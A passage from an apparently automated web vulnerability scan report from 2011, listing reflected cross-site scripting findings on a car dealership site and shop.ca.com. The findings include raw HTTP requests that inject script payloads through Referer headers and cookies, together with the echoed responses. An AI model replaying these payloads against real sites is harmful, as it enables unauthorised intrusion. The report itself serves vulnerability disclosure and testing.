Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse,CookieSet
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:35:10 GMT
Connection: close
Set-Cookie: ssoid=6118db350a0a002f005f07e8b6cd8671;path=/
Set-Cookie: JSESSIONID=4tpik3cqg96gk;path=/
Set-Cookie: ddcpoolid=CmsPoolO;path=/;
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 86751

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7071 -->

   <title>Mercedes Benz | New Mercedes dealership in Shelburne, VT 05482</title>
   <meta http-equiv=
...[SNIP]...
tact: '',
               portal: '',
               sem: '',
               rlCookie: '',
               region: '',
               keyword: '',
               locality: 'en_US',
               host: '173.193.214.243',
               sessionReferrer: 'http://www.google.com/search?hl=en&q=6e682'-alert(1)-'ef04afa0abc',
               tcdkwid: '',
               tcdcmpid: '',
               tcdadid: '',
refId: '',
               platform: '',
               version: '',
               skin: '',
               templateExtra: '',
                       type: 10,
           extra: 'INDEX'
       };
               D
...[SNIP]...
4.291. http://www.theautomastermercedesbenz.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.theautomastermercedesbenz.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5690f"><script>alert(1)</script>bc22e994a68 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: www.theautomastermercedesbenz.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=5690f"><script>alert(1)</script>bc22e994a68
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse,CookieSet
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:35:04 GMT
Connection: close
Set-Cookie: ssoid=6118c4780a0a002f005f07e8de15bd02;path=/
Set-Cookie: JSESSIONID=25aep0xbvapjr;path=/
Set-Cookie: ddcpoolid=CmsPoolO;path=/;
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 86781

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7071 -->

   <title>Mercedes Benz | New Mercedes dealership in Shelburne, VT 05482</title>
   <meta http-equiv=
...[SNIP]...
<img src="http://hits.dealer.com/clear.gif?&amp;4=0&amp;5=0&amp;10=http://www.google.com/search?hl=en&q=5690f"><script>alert(1)</script>bc22e994a68&amp;20=www.theautomastermercedesbenz.com&amp;21=/index.htm&amp;50=6118c4780a0a002f005f07e8de15bd02&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&a
...[SNIP]...
4.292. http://www.theautomastermercedesbenz.com/index.htm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.theautomastermercedesbenz.com
Path:   /index.htm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5fa27'-alert(1)-'bad3f5b4489 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /index.htm HTTP/1.1
Host: www.theautomastermercedesbenz.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=5fa27'-alert(1)-'bad3f5b4489
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse,CookieSet
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 17:03:51 GMT
Connection: close
Set-Cookie: ssoid=5f44bbc10a0a002f005f07e84766f648;path=/
Set-Cookie: JSESSIONID=51er345s2l9rv;path=/
Set-Cookie: ddcpoolid=CmsPoolO;path=/;
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 86751

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7071 -->

   <title>Mercedes Benz | New Mercedes dealership in Shelburne, VT 05482</title>
   <meta http-equiv=
...[SNIP]...
tact: '',
               portal: '',
               sem: '',
               rlCookie: '',
               region: '',
               keyword: '',
               locality: 'en_US',
               host: '173.193.214.243',
               sessionReferrer: 'http://www.google.com/search?hl=en&q=5fa27'-alert(1)-'bad3f5b4489',
               tcdkwid: '',
               tcdcmpid: '',
               tcdadid: '',
refId: '',
               platform: '',
               version: '',
               skin: '',
               templateExtra: '',
                       type: 10,
           extra: 'INDEX'
       };
               D
...[SNIP]...
4.293. http://www.theautomastermercedesbenz.com/index.htm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.theautomastermercedesbenz.com
Path:   /index.htm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 820c4"><script>alert(1)</script>48f2540543a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /index.htm HTTP/1.1
Host: www.theautomastermercedesbenz.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=820c4"><script>alert(1)</script>48f2540543a
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse,CookieSet
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 17:03:47 GMT
Connection: close
Set-Cookie: ssoid=5f44ada50a0a002f005f07e8f4120276;path=/
Set-Cookie: JSESSIONID=9a34h8dp52u7n;path=/
Set-Cookie: ddcpoolid=CmsPoolO;path=/;
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 86781

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7071 -->

   <title>Mercedes Benz | New Mercedes dealership in Shelburne, VT 05482</title>
   <meta http-equiv=
...[SNIP]...
<img src="http://hits.dealer.com/clear.gif?&amp;4=0&amp;5=0&amp;10=http://www.google.com/search?hl=en&q=820c4"><script>alert(1)</script>48f2540543a&amp;20=www.theautomastermercedesbenz.com&amp;21=/index.htm&amp;50=5f44ada50a0a002f005f07e8f4120276&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&a
...[SNIP]...
4.294. http://shop.ca.com/applications/email/d_subscribe.asp [Cart cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.ca.com
Path:   /applications/email/d_subscribe.asp

Issue detail

The value of the Cart cookie is copied into an HTML comment. The payload 5521d--><script>alert(1)</script>dc59d49c34 was submitted in the Cart cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /applications/email/d_subscribe.asp HTTP/1.1
Host: shop.ca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SessionId=1310349220110417085445173193214243; __utmz=36441954.1303044886.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Order=orderTotal=; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg&Survey=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msProduct=1782427&msRandX=93; Cart=PHPromo=N&Referer=&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp5521d--><script>alert(1)</script>dc59d49c34; CoreID6=81872050743513030451330&ci=; beta=Y; SRCCODE=CAWEB; SRVR=WEBX140%2D01C; IS3_History=1301114230-2-91_0--2__0_0; IS3_GSV=DPL-2_TES-1303045130_PCT-1303045130_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; __utma=36441954.679833155.1303044886.1303044886.1303044886.1; __utmc=36441954; __utmb=36441954.3.10.1303044886; _clogin=l=1303045133&v=7&e=1303046939452;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIAWEB01C
X-Powered-By: ASP.NET
Content-Length: 9504
Content-Type: text/html
Cache-Control: private
Date: Sun, 17 Apr 2011 13:04:46 GMT
Connection: close
Set-Cookie: SRVR=WEBX140%2D01C; path=/
Set-Cookie: DB=msRandX=93&msProduct=1782427&Sidenav=B&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&Survey=1&msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: SRCCODE=CAWEB; expires=Tue, 17-May-2011 04:00:00 GMT; path=/


<html>
<head>

<TITLE>shop.ca.com - Invalid Email</TITLE>
<meta name="Author" content="TigerDirect, Inc. Web Development Team">
<meta name="copyright" content=". 2003 TigerDirect, Inc. All righ
...[SNIP]...
<!--Cart(Landing) :http://shop.ca.com/ca/resources/resources.asp5521d--><script>alert(1)</script>dc59d49c34-->
...[SNIP]...
4.295. http://shop.ca.com/applications/email/d_subscribe.asp [CoreID6 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.ca.com
Path:   /applications/email/d_subscribe.asp

Issue detail

The value of the CoreID6 cookie is copied into an HTML comment. The payload b2cdc--><script>alert(1)</script>82614f1262c was submitted in the CoreID6 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /applications/email/d_subscribe.asp HTTP/1.1
Host: shop.ca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SessionId=1310349220110417085445173193214243; __utmz=36441954.1303044886.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Order=orderTotal=; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg&Survey=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msProduct=1782427&msRandX=93; Cart=PHPromo=N&Referer=&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp; CoreID6=81872050743513030451330&ci=b2cdc--><script>alert(1)</script>82614f1262c; beta=Y; SRCCODE=CAWEB; SRVR=WEBX140%2D01C; IS3_History=1301114230-2-91_0--2__0_0; IS3_GSV=DPL-2_TES-1303045130_PCT-1303045130_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; __utma=36441954.679833155.1303044886.1303044886.1303044886.1; __utmc=36441954; __utmb=36441954.3.10.1303044886; _clogin=l=1303045133&v=7&e=1303046939452;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIAWEB01C
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private
Date: Sun, 17 Apr 2011 13:04:46 GMT
Content-Length: 9505
Connection: close
Set-Cookie: SRVR=WEBX140%2D01C; path=/
Set-Cookie: DB=msRandX=93&msProduct=1782427&Sidenav=A&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&Survey=1&msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: SRCCODE=CAWEB; expires=Tue, 17-May-2011 04:00:00 GMT; path=/


<html>
<head>

<TITLE>shop.ca.com - Invalid Email</TITLE>
<meta name="Author" content="TigerDirect, Inc. Web Development Team">
<meta name="copyright" content=". 2003 TigerDirect, Inc. All righ
...[SNIP]...
<!--CoreID6(818720507435:b2cdc--><script>alert(1)</script>82614f1262c-->
...[SNIP]...
4.296. http://shop.ca.com/applications/email/d_subscribe.asp [DB cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.ca.com
Path:   /applications/email/d_subscribe.asp

Issue detail

The value of the DB cookie is copied into an HTML comment. The payload e77e5--><script>alert(1)</script>0f2b82797b3 was submitted in the DB cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /applications/email/d_subscribe.asp HTTP/1.1
Host: shop.ca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SessionId=1310349220110417085445173193214243; __utmz=36441954.1303044886.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Order=orderTotal=; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg&Survey=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msProduct=1782427&msRandX=93e77e5--><script>alert(1)</script>0f2b82797b3; Cart=PHPromo=N&Referer=&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp; CoreID6=81872050743513030451330&ci=; beta=Y; SRCCODE=CAWEB; SRVR=WEBX140%2D01C; IS3_History=1301114230-2-91_0--2__0_0; IS3_GSV=DPL-2_TES-1303045130_PCT-1303045130_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; __utma=36441954.679833155.1303044886.1303044886.1303044886.1; __utmc=36441954; __utmb=36441954.3.10.1303044886; _clogin=l=1303045133&v=7&e=1303046939452;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIAWEB01C
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private
Date: Sun, 17 Apr 2011 13:04:45 GMT
Content-Length: 9505
Connection: close
Set-Cookie: SRVR=WEBX140%2D01C; path=/
Set-Cookie: DB=msRandX=93e77e5%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E0f2b82797b3&msProduct=1782427&Sidenav=A&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&Survey=1&msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: SRCCODE=CAWEB; expires=Tue, 17-May-2011 04:00:00 GMT; path=/


<html>
<head>

<TITLE>shop.ca.com - Invalid Email</TITLE>
<meta name="Author" content="TigerDirect, Inc. Web Development Team">
<meta name="copyright" content=". 2003 TigerDirect, Inc. All righ
...[SNIP]...
<!--DB(msRandX) :93e77e5--><script>alert(1)</script>0f2b82797b3-->
...[SNIP]...
4.297. http://shop.ca.com/applications/email/d_subscribe.asp [IS3_GSV cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.ca.com
Path:   /applications/email/d_subscribe.asp

Issue detail

The value of the IS3_GSV cookie is copied into an HTML comment. The payload 87dd2--><script>alert(1)</script>b6b9a57e245 was submitted in the IS3_GSV cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /applications/email/d_subscribe.asp HTTP/1.1
Host: shop.ca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SessionId=1310349220110417085445173193214243; __utmz=36441954.1303044886.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Order=orderTotal=; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg&Survey=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msProduct=1782427&msRandX=93; Cart=PHPromo=N&Referer=&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp; CoreID6=81872050743513030451330&ci=; beta=Y; SRCCODE=CAWEB; SRVR=WEBX140%2D01C; IS3_History=1301114230-2-91_0--2__0_0; IS3_GSV=DPL-2_TES-1303045130_PCT-1303045130_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com87dd2--><script>alert(1)</script>b6b9a57e245; __utma=36441954.679833155.1303044886.1303044886.1303044886.1; __utmc=36441954; __utmb=36441954.3.10.1303044886; _clogin=l=1303045133&v=7&e=1303046939452;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIAWEB01C
X-Powered-By: ASP.NET
Content-Length: 9505
Content-Type: text/html
Cache-Control: private
Date: Sun, 17 Apr 2011 13:04:48 GMT
Connection: close
Set-Cookie: SRVR=WEBX140%2D01C; path=/
Set-Cookie: DB=msRandX=93&msProduct=1782427&Sidenav=B&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&Survey=1&msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: SRCCODE=CAWEB; expires=Tue, 17-May-2011 04:00:00 GMT; path=/


<html>
<head>

<TITLE>shop.ca.com - Invalid Email</TITLE>
<meta name="Author" content="TigerDirect, Inc. Web Development Team">
<meta name="copyright" content=". 2003 TigerDirect, Inc. All righ
...[SNIP]...
<!--IS3_GSV :DPL-2_TES-1303045130_PCT-1303045130_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com87dd2--><script>alert(1)</script>b6b9a57e245-->
...[SNIP]...
4.298. http://shop.ca.com/applications/email/d_subscribe.asp [IS3_History cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.ca.com
Path:   /applications/email/d_subscribe.asp

Issue detail

The value of the IS3_History cookie is copied into an HTML comment. The payload f0b71--><script>alert(1)</script>03cb65b912f was submitted in the IS3_History cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /applications/email/d_subscribe.asp HTTP/1.1
Host: shop.ca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SessionId=1310349220110417085445173193214243; __utmz=36441954.1303044886.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Order=orderTotal=; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg&Survey=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msProduct=1782427&msRandX=93; Cart=PHPromo=N&Referer=&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp; CoreID6=81872050743513030451330&ci=; beta=Y; SRCCODE=CAWEB; SRVR=WEBX140%2D01C; IS3_History=1301114230-2-91_0--2__0_0f0b71--><script>alert(1)</script>03cb65b912f; IS3_GSV=DPL-2_TES-1303045130_PCT-1303045130_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; __utma=36441954.679833155.1303044886.1303044886.1303044886.1; __utmc=36441954; __utmb=36441954.3.10.1303044886; _clogin=l=1303045133&v=7&e=1303046939452;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIAWEB01C
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private
Date: Sun, 17 Apr 2011 13:04:48 GMT
Content-Length: 9505
Connection: close
Set-Cookie: SRVR=WEBX140%2D01C; path=/
Set-Cookie: DB=msRandX=93&msProduct=1782427&Sidenav=A&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&Survey=1&msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: SRCCODE=CAWEB; expires=Tue, 17-May-2011 04:00:00 GMT; path=/


<html>
<head>

<TITLE>shop.ca.com - Invalid Email</TITLE>
<meta name="Author" content="TigerDirect, Inc. Web Development Team">
<meta name="copyright" content=". 2003 TigerDirect, Inc. All righ
...[SNIP]...
<!--IS3_History :1301114230-2-91_0--2__0_0f0b71--><script>alert(1)</script>03cb65b912f-->
...[SNIP]...
4.299. http://shop.ca.com/applications/email/d_subscribe.asp [Order cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.ca.com
Path:   /applications/email/d_subscribe.asp

Issue detail

The value of the Order cookie is copied into an HTML comment. The payload e64a7--><script>alert(1)</script>c02a91f6745 was submitted in the Order cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /applications/email/d_subscribe.asp HTTP/1.1
Host: shop.ca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SessionId=1310349220110417085445173193214243; __utmz=36441954.1303044886.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Order=orderTotal=e64a7--><script>alert(1)</script>c02a91f6745; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg&Survey=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msProduct=1782427&msRandX=93; Cart=PHPromo=N&Referer=&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp; CoreID6=81872050743513030451330&ci=; beta=Y; SRCCODE=CAWEB; SRVR=WEBX140%2D01C; IS3_History=1301114230-2-91_0--2__0_0; IS3_GSV=DPL-2_TES-1303045130_PCT-1303045130_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; __utma=36441954.679833155.1303044886.1303044886.1303044886.1; __utmc=36441954; __utmb=36441954.3.10.1303044886; _clogin=l=1303045133&v=7&e=1303046939452;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIAWEB01C
X-Powered-By: ASP.NET
Content-Length: 9505
Content-Type: text/html
Cache-Control: private
Date: Sun, 17 Apr 2011 13:04:44 GMT
Connection: close
Set-Cookie: SRVR=WEBX140%2D01C; path=/
Set-Cookie: DB=msRandX=93&msProduct=1782427&Sidenav=A&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&Survey=1&msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: SRCCODE=CAWEB; expires=Tue, 17-May-2011 04:00:00 GMT; path=/


<html>
<head>

<TITLE>shop.ca.com - Invalid Email</TITLE>
<meta name="Author" content="TigerDirect, Inc. Web Development Team">
<meta name="copyright" content=". 2003 TigerDirect, Inc. All righ
...[SNIP]...
<!--Order(orderTotal) :e64a7--><script>alert(1)</script>c02a91f6745-->
...[SNIP]...
4.300. http://shop.ca.com/applications/email/d_subscribe.asp [SessionId cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.ca.com
Path:   /applications/email/d_subscribe.asp

Issue detail

The value of the SessionId cookie is copied into an HTML comment. The payload 89285--><script>alert(1)</script>4c3b13506ed was submitted in the SessionId cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

